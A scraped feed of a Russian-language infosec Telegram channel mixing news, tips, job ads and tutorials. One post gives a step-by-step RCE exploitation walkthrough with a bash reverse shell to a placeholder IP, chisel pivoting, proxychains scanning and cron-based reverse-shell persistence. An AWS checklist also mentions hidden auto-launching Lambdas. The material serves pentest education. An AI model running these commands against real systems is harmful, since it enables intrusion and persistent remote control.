tgoop.com »
United States »
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность » Telegram Web
Пентест — это не только найти дыру, но и грамотно донести ее до заказчика или баг-баунти платформы. А составлять отчет — задача неблагодарная: муторно, долго, да ещё и Markdown забывается в самый нужный момент.
Чтобы не тратить время на шаблоны и формулировки, вот промпт, который делает все за вас:
Write a bug bounty report for the following reflected XSS: [вставьте PoC]. Include: Title, VRT, CVSS, Description, Impact, PoC, and recommended Fix. Use Markdown.
Что получаем на выходе:
Можно использовать не только для XSS, но и для SQLi, IDOR, CSRF и других находок — просто адаптируй PoC и вуаля.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔6❤1👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7❤1
Это один из самых тревожных и, увы, до сих пор реальных сценариев: ты нашёл базу данных и хочешь понять, насколько безответственно там обращаются с паролями. Вот как быстро это проверить.
Шаги:
Если ты на этапе баг-баунти — это может быть через SQL-инъекцию или доступ к резервным копиям. Мы не поощряем взлом — только разрешённое тестирование.
Обычно:
users, accounts, members, login, auth.
123456, admin, qwerty
— это plaintext
. bcrypt, MD5, SHA-1
).Если у всех пользователей одинаковый пароль, но хеши разные — скорее всего, применяется соль. Это хорошо. Если хеши совпадают — соль не используется. Это плохо.
— Не публикуй реальные дампы или пароли — это нарушение этики и закона.
— Не используй полученные данные за пределами согласованных условий пентеста.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2👏2
Тебе говорят:
«Разрешим сотрудникам работать с личных устройств — пусть будет удобно!»
И вот уже backend-инженер пушит в репу с iPad-а, дизайнер гоняет макет с домашнего ноута, а кто-то подключается к корпоративной Wi-Fi с телефона, где стоит TikTok, Telegram, торренты и три анонимных VPN-а.
Плюсы:
Минусы:
Плюсы:
Минусы:
BYOD — это как звать людей на вечеринку с их алкоголем. Да, дешевле. Но кто потом будет разбираться, кто разбил стекло, кто выключил сигнализацию и кто унес с собой флешку с исходниками?
А у вас в компании как? Делитесь практиками в комментах
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3👾2
Ctrl + R
— отправляет текущий запрос из Proxy, HTTP history или Intruder прямо в Repeater.Зачем это нужно:
• Мгновенно переключиться к ручному редактированию запроса.
• Позволяет точно тестировать различные payload’ы и видеть, как сервер реагирует.
• Удобно при исследовании уязвимостей типа IDOR, XSS, SQLi.
Пример сценария:
1. Перехватил запрос в Proxy.
2. Видишь интересный параметр в GET-запросе.
3. Нажал
Ctrl + R
— и он уже в Repeater, где можно экспериментировать с инъекциями.Ctrl + Shift + L
— для отправки всех табов одним кликом, если проверяешь цепочку запросов.#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2❤1
Каждый год хакеры соревнуются не только в CTF и баунти, но и за престиж. Pentest Award — это премия для тех, кто не просто нашёл баг, а сделал это красиво, эффективно и с пользой. Организатор — компания «Авилликс».
В 2025 году номинаций стало больше, и теперь каждый найдёт своё поле боя:
Новые категории:
Сколько стоит и что получите:
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤2👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚3❤1😁1
Это критическая дыра в Cisco IOS XE — прошивке, которую используют маршрутизаторы и коммутаторы.
Что можно после взлома:
• Добавлять/удалять пользователей
• Выполнять команды через CLI
• Полностью управлять устройством
Обновить прошивку. Никаких патчей — только апдейт.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2❤1
Знание их особенностей безопасности становится критически важным для пентестеров. Кроме того, использование Shodan позволяет обнаруживать скрытые ресурсы без доменных имен, расширяя возможности разведки.
Системы, такие как PenTest++, интегрируют генеративный ИИ для оптимизации рабочих процессов, включая разведку, сканирование и эксплуатацию уязвимостей. Это позволяет ускорить рутинные задачи, оставляя больше времени для стратегического анализа.
Пентест в финансовом секторе фокусируется на сложной инфраструктуре и строгих регуляциях. ИИ и автоматические системы помогают быстро выявлять угрозы, а тестирование ИИ-моделей направлено на предотвращение мошенничества.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1😁1
CIA, или триада ЦРУ, — это модель политики ИБ компании.
• конфиденциальность — это перечень нормативов, которые ограничивают доступ к информации компании;
• целостность — гарантия достоверности и точности информации;
• доступность — возможность сотрудникам с правом доступа пользоваться данными.
👍 — если уже знал/а ответ
🌚 — узнал/а новое
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🌚8🔥1
🔥 Конкурс: 30 000 ₽ за самую смешную IT-новость
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Google Docs
Конкурс на самую смешную IT-новость
Библиотека программиста запускает конкурс, который взорвет вашу ленту: создайте самую смешную альтернативную версию реальной IT-новости!
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
👍2🔥2❤1
Middle/Senior Application Security Engineer — от 250 000 ₽, удаленно (Москва)
Инженер по информационной безопасности — от 160 000 ₽, офис (Екатеринбург)
Pentester в RedTeam команду — 150 000 - 300 000 ₽, удаленно (Москва)
Специалист по информационной безопасности — от 157 500 ₽ , офис (Казань)
Information Security Specialist (Middle) — офис (Санкт-Петербург)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥2❤1
Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.
nmap -p 80,443 --script http-vuln* <target_ip>
— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:
curl "http://target.com/test.php?cmd=id"
⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.
Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
—
python3 -c 'import socket,os,...'
—
php -r '...reverse shell...'
— perl, nc -e, curl | sh
— в зависимости от окруженияnc -lvnp 4444
Например, chisel:
# На атакующей машине
chisel server -p 8000 --reverse
# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks
⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)
Настрой файл /etc/proxychains.conf на:
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24
⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.
- cronjob:
* * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1
- systemd:
.service
с автозапуском- загрузка агента
Metasploit
- использование
ssh-keygen
и подмена .ssh/authorized_keys
🧠 Примечания:
• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.
⚠️ Disclaimer:
Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8😁2❤1🔥1
Google выпустила майский патч безопасности Android — устранил 46 уязвимостей, но одна из них уже используется в атаках.
CVE-2025-27363 (CVSS 8.1) — критическая дыра в библиотеке FreeType, позволяет выполнить код без взаимодействия с пользователем. Ошибка устранена в FreeType 2.13.0+.
Обновление от 5 мая устраняет также баги в ядре, фреймворке, GPU PowerVR, ARM Mali, модемах MediaTek и чипах Qualcomm.
Теперь Android — это не только прошивка. Безопасность зависит от Google Play Protect и Project Mainline. Проверьте, актуален ли ваш патч
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2🤩1
Эта команда позволяет мониторить файл аутентификации в режиме реального времени, фильтруя события, связанные с SSH:
tail -f /var/log/auth.log | grep ssh
tail -f
— выводит новые строки по мере их появления.grep ssh
— фильтрует только те строки, которые содержат информацию об SSH. Используется для:
• Отслеживания попыток подключения по SSH.
• Выявления неудачных попыток входа.
• Мониторинга активности пользователей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2😁2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁2🥱2🔥1
• Зафиксируйте цели, допустимые действия, допустимый ущерб (ROE)
• Определить зону тестирования и уточните какие сервисы используются (EC2, S3, IAM, Lambda и т.д.)
• Включите логирование — CloudTrail, GuardDuty
• Определите публичные сервисы/ресурсы: S3-бакеты, API Gateway, EC2-инстансы
• Проверьте открытые DNS-записи (dig, nslookup, Amass)
• Проверьте на наличие избыточных прав (например, *:* в политиках)
• Поищите роли, которые можно перехватить или эскалировать
• Проверьте учетные данные в переменных среды, Lambda, EC2 UserData
• Найдите публичные бакеты
aws s3 ls s3://bucket-name --no-sign-request
• Проверьте разрешения: чтение, запись, листинг
s3:ListBucket, s3:GetObject
• Попробуйте bucket takeover через DNS или CNAME
• Проанализируйте Security Groups и NACLs: открытые порты, экспонированные сервисы
• Поищите интернал-сервисов через разрешённые VPC endpoints
• Протестируйте API на ошибки (XSS, IDOR, Injection)
• Поищите секреты в ENV, логи, исходный код
• Исследуйте другие регионы, сервисы, связанные аккаунты
• Создайте скрытые Lambda-функции или роли с автоматическим запуском.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2
Сегодня делимся вопросом от подписчика, который хочет понять, как выглядит повседневная работа в профессии этичного хакера — без прикрас и киношных эффектов.
Вот что он пишет:
«Этичный хакер — это больше про поиск уязвимостей или написание отчетов? Какой процент времени тратится на что?»
Что мы советуем:
— Веб: Burp Suite, ffuf
— Сети: Nmap, Metasploit
— AD: BloodHound, CrackMapExec
— Облака: ScoutSuite, Pacu
P.S. Если хотите задать вопрос, заполните нашу гугл-форму. Это займет 5 минут.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
Кверти — подкаст о кибербезе без скучных лекций. Его ведут специалист по информационной безопасности и параноик-энтузиаст, который всегда ждёт подвоха.
Они обсуждают, как устроен мир цифровых угроз, на чем ловят пользователей и что на самом деле происходит за кулисами индустрии защиты.
Рекомендуемые выпуски:
Практика, сертификация BSCP, реальные вызовы и влияние на карьеру.
Немного истории появления пентеста, обсуждению личности Кевина Митника и различиям между видами пентеста.
Разница с пентестерами и AppSec, старт в баг-баунти и типичные ошибки.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥2
Если вы ищете работу в ИБ, вакансия — это первое, что говорит о зрелости процессов в компании.
Что в статье:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🥱2❤1🔥1😁1